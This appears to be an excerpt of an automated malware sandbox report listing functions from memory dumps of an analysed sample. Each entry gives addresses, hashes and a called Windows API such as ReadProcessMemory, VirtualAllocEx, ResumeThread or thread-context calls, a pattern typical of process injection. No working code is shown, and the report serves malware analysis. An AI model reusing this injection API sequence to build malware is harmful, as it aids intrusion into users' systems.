Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7e0a8da76f22175e18bbccf95133c2368cbd86041869aafc2c968659063b5b87
Instruction ID: db65d6ddcad8d60ca753bbe809e77cab0e25a63bd698fa42d30414ae8fbe7aec
Opcode Fuzzy Hash: 7e0a8da76f22175e18bbccf95133c2368cbd86041869aafc2c968659063b5b87
Instruction Fuzzy Hash: 522149B1D003098FDB10DFAAC4857EEBBF4EF88324F108429D459A7241C778A944CFA5

Function 0763ED38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0763EDB8

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3996ed6483b366b0b10ab47035e71d09633b96a3cdc194c305dfbd87b01c50c6
Instruction ID: 601519a5594683d036c526415dfe204446459ea6a57103500713d1e638f0f306
Opcode Fuzzy Hash: 3996ed6483b366b0b10ab47035e71d09633b96a3cdc194c305dfbd87b01c50c6
Instruction Fuzzy Hash: CA2116B19002599FCB10DFAAC845AEEBBF5FF48310F108429E559A7250D7399544CBA5

Function 04FF1D68 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04FF1DEF

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c2a4ff5d179118475d3e75bd9986e5c410f6066b9afda0df6b04848ae77dd744
Instruction ID: 281e93e1560003a86262196cfade236323b4dd633e75a384ad4281952fcdc545
Opcode Fuzzy Hash: c2a4ff5d179118475d3e75bd9986e5c410f6066b9afda0df6b04848ae77dd744
Instruction Fuzzy Hash: 4221C4B5900258DFDB10CF9AD984ADEBBF8EF48310F14841AE954A7350D374A944CFA5

Function 0763ED37 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0763EDB8

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8025ae6230c46b284f3f2ae35d1ce98496f8db8638a34340f00f5865d94a08a1
Instruction ID: ebcb049227d12dc030a27a8fc3fe5831da28ef5b3dad03e326404974e9eaaa90
Opcode Fuzzy Hash: 8025ae6230c46b284f3f2ae35d1ce98496f8db8638a34340f00f5865d94a08a1
Instruction Fuzzy Hash: 6F2125B1D002599FCB10CFA9C985BEEBBF5FF48310F14882AE559A7250D7389544CBA4

Function 0763EB80 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0763EBF6

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a1e7ac5d75e5cb4dfbd9b13caaa435fb91befae6b2811feef24637f551b6dd91
Instruction ID: 4abfac12722ab2f496697081ef92844671e3262e9cc02b29c9640775e5405999
Opcode Fuzzy Hash: a1e7ac5d75e5cb4dfbd9b13caaa435fb91befae6b2811feef24637f551b6dd91
Instruction Fuzzy Hash: 341167B68002599FCF10DFA9C945BDEBBF5EF48320F20881AE529A7250C7359954CFA0

Function 0763EB88 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0763EBF6

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 22c59ca0d732b2a702988c6b51edf3d96c333f3ceed4d7e72a1fadb81b15cdf8
Instruction ID: 618b108a2add48c7c2515972a3d0930adfb6a295d048e9858fa17f03c362934b
Opcode Fuzzy Hash: 22c59ca0d732b2a702988c6b51edf3d96c333f3ceed4d7e72a1fadb81b15cdf8
Instruction Fuzzy Hash: 381167B18002499FCB10DFAAC844BDEBFF5EF88320F108819E519A7250C735A944CFA4

Function 0763E5C3 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0763E62A

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 881c9c285de2e3b5c38247f7c7cc7f43654b634ad430a454da36b920d66d6368
Instruction ID: 0fb349b09ae2662af8af03ca59bb7c52bf3eb08508083c85415a905b64fe142a
Opcode Fuzzy Hash: 881c9c285de2e3b5c38247f7c7cc7f43654b634ad430a454da36b920d66d6368
Instruction Fuzzy Hash: 971128B5D003598FCB20DFAAC5497DEFBF4AF48324F24881AC459A7250D739A544CFA5

Function 0763E5C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0763E62A

Memory Dump Source

Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 70d9584d0e56e1d567bf65c126d2cb7c142acc2caaaae1c5a3dce2f2ab1612e4
Instruction ID: d65a43f2d9abbfb80d3566208d469c8da2a7159c8352c5e8ef7517435ecd9b86
Opcode Fuzzy Hash: 70d9584d0e56e1d567bf65c126d2cb7c142acc2caaaae1c5a3dce2f2ab1612e4
Instruction Fuzzy Hash: 761128B19002598BCB20DFAAC4457DEFBF4EB88324F248819D459A7250C775A544CFA5

Function 0108BA60 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0108BAC6

Memory Dump Source

Source File: 00000009.00000002.1802663033.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1080000_lkuPOyvaWlIu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d7337ade963076d7c3dc10e63e10612b7bc5e67f61eacc8d34df02400fc4c75f
Instruction ID: 981a7051ff543d6b127b1cca6b0da02cec29066aa82fa59ed0b60ed5926fb174
Opcode Fuzzy Hash: d7337ade963076d7c3dc10e63e10612b7bc5e67f61eacc8d34df02400fc4c75f
Instruction Fuzzy Hash: 24110FB5C002498FDB10DF9AD444ADEFBF4EB88224F14846AD498A7610D379A545CFA5

Function 04FF1948 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 04FF23B5

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9b17d8e67a1139c798c9417299ddffe14e56317d3ae2349c63e7023092607866
Instruction ID: d56f8700935a289ef6e11baa814c8bc7ce295d8f65870103efb551eb98592539
Opcode Fuzzy Hash: 9b17d8e67a1139c798c9417299ddffe14e56317d3ae2349c63e7023092607866
Instruction Fuzzy Hash: F91145B59003488FDB20DF9AC848BDEFBF4EB48324F108459D518A7320D375A944CFA6

Function 04FF2358 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 04FF23B5

Memory Dump Source

Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 76c3f3d4e8ad5ef8f36f432a586903684bb2b3242d7020beca52960d03bd0168
Instruction ID: d952e38b8b29133c4f433c0c7c468614e88ae0721ed45af65501372f4a8e0edd
Opcode Fuzzy Hash: 76c3f3d4e8ad5ef8f36f432a586903684bb2b3242d7020beca52960d03bd0168
Instruction Fuzzy Hash: AE1100B5C003488FDB20CF99D549BDEBBF4EF08324F24885AD558A7621D339A945CFA6

Function 07B703A0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

(, xrefs: 07B70265

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: dd5d3712748d2ea15906ec5fd780de8c2a833794bc9751be8baacf0404e24870
Instruction ID: affa722f432a98a74ff996a9c0eecd405fb7ad05bfe058a751aa75a465a1aa6a
Opcode Fuzzy Hash: dd5d3712748d2ea15906ec5fd780de8c2a833794bc9751be8baacf0404e24870
Instruction Fuzzy Hash: 7951D7B4919228CFEB64DF64D884BE9BBB9FB4A301F1491DAD05DA7242D7305AC5CF40

Function 07B718C8 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6659b6937d9439aadf0137ec8add7a5916246b87f2106771a0c6ecf137d1eb15
Instruction ID: a6e3a8468cc727d67aa2972040d0f4678bb120c35271dc14baed7969b1ab1fdf
Opcode Fuzzy Hash: 6659b6937d9439aadf0137ec8add7a5916246b87f2106771a0c6ecf137d1eb15
Instruction Fuzzy Hash: 43B1ACB4B012099FDB14DBA8D594BAEBBF6EF88700F2440A9E455DB3A1DB30DD01CB61

Function 07B70B32 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83512023d42d17da40286e06a54ac4bba45c60346338a2f864722c30b919465b
Instruction ID: fb118df91e0756b5ba8750f3e68d7fc3faadd7f5606bce325cfdd2fc823eb4d2
Opcode Fuzzy Hash: 83512023d42d17da40286e06a54ac4bba45c60346338a2f864722c30b919465b
Instruction Fuzzy Hash: 7C31F7B0D5421ACFDB60DF65C8406E8BBB5FF9A300F1066EBE419A2211EB705AC4CF40

Function 00B9D06C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdb464f4238f3b6ba5e688a72876216674678318612951dfbc131af57f3a3f9
Instruction ID: 1504abf276c4419df3a51c4b4b4899411b896eb4c8b3562e860996b6ce9b6a01
Opcode Fuzzy Hash: acdb464f4238f3b6ba5e688a72876216674678318612951dfbc131af57f3a3f9
Instruction Fuzzy Hash: B721F172504240EFCF059F14D9C4B26BFA6FB98314F24C6B9E9091B256C33AD816CBA1

Function 00BAD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
Instruction ID: c7b78ae4d88881361ac37c7e5901d1d0274fe7888660484e43619e7f529a8705
Opcode Fuzzy Hash: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
Instruction Fuzzy Hash: 83210471608200DFCB24DF24D9D4B26BFA5FB89314F20C5ADD84A4B696C33AD847CA61

Function 00BAD2F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2e556e09c932ff3b9e485684055dff259d3a80b0900ef3fcf3e07d6681e7d3
Instruction ID: d3ff465fbf5152109a9b79cf8ee32a77219a9b66e7c63030a2c53d15fab7f0b1
Opcode Fuzzy Hash: 0d2e556e09c932ff3b9e485684055dff259d3a80b0900ef3fcf3e07d6681e7d3
Instruction Fuzzy Hash: 0F2104B1608204DFCF04DF24D9C0B2ABBE5FB85714F20C5ADE84A4B656C33AD846CA66

Function 00BAD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aeaf66f532c9dd658d0bdd3f4a5b42dd1881a95478d48418a486e0807ad04fa
Instruction ID: ff28d2eb8ef45aa6df6d646875d646304d9c17d525bfa5dab9980833dce72614
Opcode Fuzzy Hash: 4aeaf66f532c9dd658d0bdd3f4a5b42dd1881a95478d48418a486e0807ad04fa
Instruction Fuzzy Hash: 1F2184755093808FDB16CF24D594715BFB1EB46314F28C5DAD8498F697C33AD80ACB62

Function 07B70760 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb84862151e71d152e0b06df2906283e5f73099ed72a1cb768eb8db7b9a190f
Instruction ID: b44f775b74def1abf7088d7b052fd2ca48ab7406042fa4f178ba1482ca3c60ec
Opcode Fuzzy Hash: 1fb84862151e71d152e0b06df2906283e5f73099ed72a1cb768eb8db7b9a190f
Instruction Fuzzy Hash: E92129B4919218CFEB20DF54C994BECBBF9FB4A310F0491DAD459A7241C7319A86CF50

Function 00B9D067 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: 7676f3487731f966b6c3083500c25aba18a5fb95b8f9ce35f8ef3cf880c56c7b
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: EA219D76504284DFDF06CF10D9C4B16BFB2FB98314F24C6A9D9491B256C33AD826CB91

Function 07B70585 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea478bd413d2a7bdc47a5cdcc1a3eaf8b324704665ec1ba3ca62b6fb4a2f8b98
Instruction ID: 1a7e8a82e6e23f490dba5f7cc4d98c556283ba8fa9dfd825e66b9927e6d91a88
Opcode Fuzzy Hash: ea478bd413d2a7bdc47a5cdcc1a3eaf8b324704665ec1ba3ca62b6fb4a2f8b98
Instruction Fuzzy Hash: D921F9B8918218CFDB64DF60C884BF8BBB5EB4A315F1491DA841DA7295C7349ACACF50

Function 00BAD2EB Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 63cd5d26c2c74ac97a353690179db7765135fb8866b3d7dfed7c53f1323767bd
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: CE11DD75508280CFCB01CF14D5C4B19BFB1FB85314F24C6AAD84A4B656C33AD80ACB62

Function 00B9D92D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2884a4d3eb6e4f056cc11a22481ab9616e40bb0529e8ab1b665508e0d6ce356a
Instruction ID: 384374cc671490df6381691103b96bf2c19bf255e5dadef4e54f317f80ccb798
Opcode Fuzzy Hash: 2884a4d3eb6e4f056cc11a22481ab9616e40bb0529e8ab1b665508e0d6ce356a
Instruction Fuzzy Hash: 0201A2711093409AEB20AF2BC9C4767BFD8EF45324F18C4BAED594A297C2799844C6B1

Function 07B70143 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4d10ae460715a52a0bb4fab83865ce044285cac2e81a453d7cc04f90ee2274
Instruction ID: eebb0feda16b813ca51422c59a1c88cef451a559b42593122f2e4413a5f14531
Opcode Fuzzy Hash: 4f4d10ae460715a52a0bb4fab83865ce044285cac2e81a453d7cc04f90ee2274
Instruction Fuzzy Hash: 4B0108B4A54218DFFB20DF55CC45FE8BBB8EB49300F1080D6A549A7281DB706A81CF10

Function 07B7178F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce20746da2642e9464cf34ecea9fe7844d5fb881686c1f05b68e50957452b4c5
Instruction ID: 58900862be6f6b36f33ba36ef26ebc59539325098ebdde8ce779923363f3d490
Opcode Fuzzy Hash: ce20746da2642e9464cf34ecea9fe7844d5fb881686c1f05b68e50957452b4c5
Instruction Fuzzy Hash: 5CF0B4B0A0020D9FD740EF78D44669E7BF2EB84600F10C4B5D429DB350EB748902CF90

Function 00B9D92C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0ca025b39a898d40cf5deaf3249472040e9cf82605de4b4109e966de93ec1d
Instruction ID: b265e2dd0dc913ee97a9b35c824f21a9af5ec66fc4652ac928f24fdd40c361db
Opcode Fuzzy Hash: 9d0ca025b39a898d40cf5deaf3249472040e9cf82605de4b4109e966de93ec1d
Instruction Fuzzy Hash: 50F062714053449EEB209B16C8C8BA6FFE8EB55724F18C45AED484A287C279AC44CAB1

Function 07B70495 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fd3bb272d8784546d4811c46e0de6edb9af2eea49bd7895dfc89d244bd5326
Instruction ID: 50afe6ef1210598cbf795790716006d5deb9196516b2d97639fdbdc2bbdd8000
Opcode Fuzzy Hash: 75fd3bb272d8784546d4811c46e0de6edb9af2eea49bd7895dfc89d244bd5326
Instruction Fuzzy Hash: DA016DB1918259CFEB21DB64C844BE9BBB5EB0A310F2482EAD06D571E2C3315A86CF01

Function 07B717E7 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63fc3ea928d3fe82ab6cc17d8a24ebb9ea6e765ce43be7c473f46130db4fc62f
Instruction ID: f7c81d20f4573a391bb9a0fa1a8d52576183b88947b3b1da1dd4a3768ef1f320
Opcode Fuzzy Hash: 63fc3ea928d3fe82ab6cc17d8a24ebb9ea6e765ce43be7c473f46130db4fc62f
Instruction Fuzzy Hash: 13F017B4D0020E9FEB44DFA9C846AAEBBF4EB48700F0085A9D524E7201D7708641CFA1

Function 07B72E50 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b62ce1547492f83c4e219c65b2537fd25fa0da3695484c31eddd517387b5d7
Instruction ID: 0f7ca815a5602233e3c735c119356bab1cc99ec12f4a48fa11283316a05bcf68
Opcode Fuzzy Hash: 69b62ce1547492f83c4e219c65b2537fd25fa0da3695484c31eddd517387b5d7
Instruction Fuzzy Hash: C2E022F720A2A46BD712126938140FBBF75BBC3A2130D00FFF0A69B2618A290D00C3E1

Function 07B7027F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c0f2fcf7790e735445bce5a20b91b1e503f4cf196332fc86113a6d08337998
Instruction ID: 1529bebfdf00aef2ce06419f03a1209e5088ff1b64d88fcc6adba8c659bd611b
Opcode Fuzzy Hash: 04c0f2fcf7790e735445bce5a20b91b1e503f4cf196332fc86113a6d08337998
Instruction Fuzzy Hash: 2B01A4B5904268CFEB65DF55C944BEDBBB5FB09304F1080D9D019A2291D7355A8ACF00

Function 07B701C6 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c9277f1a61f9ef0b79ed104df91e2d349703749a29734278e3d4b5eb746fa1
Instruction ID: 187505715b998e3e8526bc1a23ec89db07218b4da0a683cc8d4a058ec0b1fcf9
Opcode Fuzzy Hash: 81c9277f1a61f9ef0b79ed104df91e2d349703749a29734278e3d4b5eb746fa1
Instruction Fuzzy Hash: EE015F75A042289FDB20DB54CE94FE9BBB5AB49304F1480D9E509A7252C732AE85CF50

Function 07B717F0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546e14f1b9511a4116caffc36b66cd25b6f0f8b46904c82b1ec1b530f10a00b1
Instruction ID: 47bb31db9c203f038552ca842ef188f3ef93e9c6ee247bfd8f069a51d6b46be5
Opcode Fuzzy Hash: 546e14f1b9511a4116caffc36b66cd25b6f0f8b46904c82b1ec1b530f10a00b1
Instruction Fuzzy Hash: D2F0DAB0D1420E9FDB44DFA9C845AAEBBF4EB48310F1045A9D518E7201E7759541CFE1

Function 07B70544 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f97ab47c60d6a04890791baa9c9b85f29022b54e69c6fc5b8365154e6425d4e
Instruction ID: 3d23cd803fe7421aaa90f432bf5fc7f9be8dd07894a768955980353022fc39e2
Opcode Fuzzy Hash: 5f97ab47c60d6a04890791baa9c9b85f29022b54e69c6fc5b8365154e6425d4e
Instruction Fuzzy Hash: ACF0FEB9919258CFDB50DF20C9906E8BBF4AB1A314F5481DAD42DA7382D7319EC5CF40

Function 07B71880 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d781989e8815ca2e1993963bea001f9ef25367ac45bbd2d13d099e2525fa6a7
Instruction ID: 80779f4f93b3f3d29618c010db8b9c925b0cafea16c2ba07439f2bea293ba5e6
Opcode Fuzzy Hash: 3d781989e8815ca2e1993963bea001f9ef25367ac45bbd2d13d099e2525fa6a7
Instruction Fuzzy Hash: 85E0C23E10928C9FD742EB649840CD77FAAEB8614170480D3E044C7022E315D929D772

Function 07B704E9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c06543f0eb6e30481b56e02aad0cd344b12a95086ddc3eacb3afd186a63641
Instruction ID: 03c4831b9641684f9141b81a29ee7318630710a811bdc72205f99017767f1fb6
Opcode Fuzzy Hash: 91c06543f0eb6e30481b56e02aad0cd344b12a95086ddc3eacb3afd186a63641
Instruction Fuzzy Hash: 7FE0ED78914218CFCB50DF25C8546E8BBB5FB4E310F5096D9942EA7291DB319E86CF40

Function 07B72E60 Relevance: .0, Instructions: 19COMMON

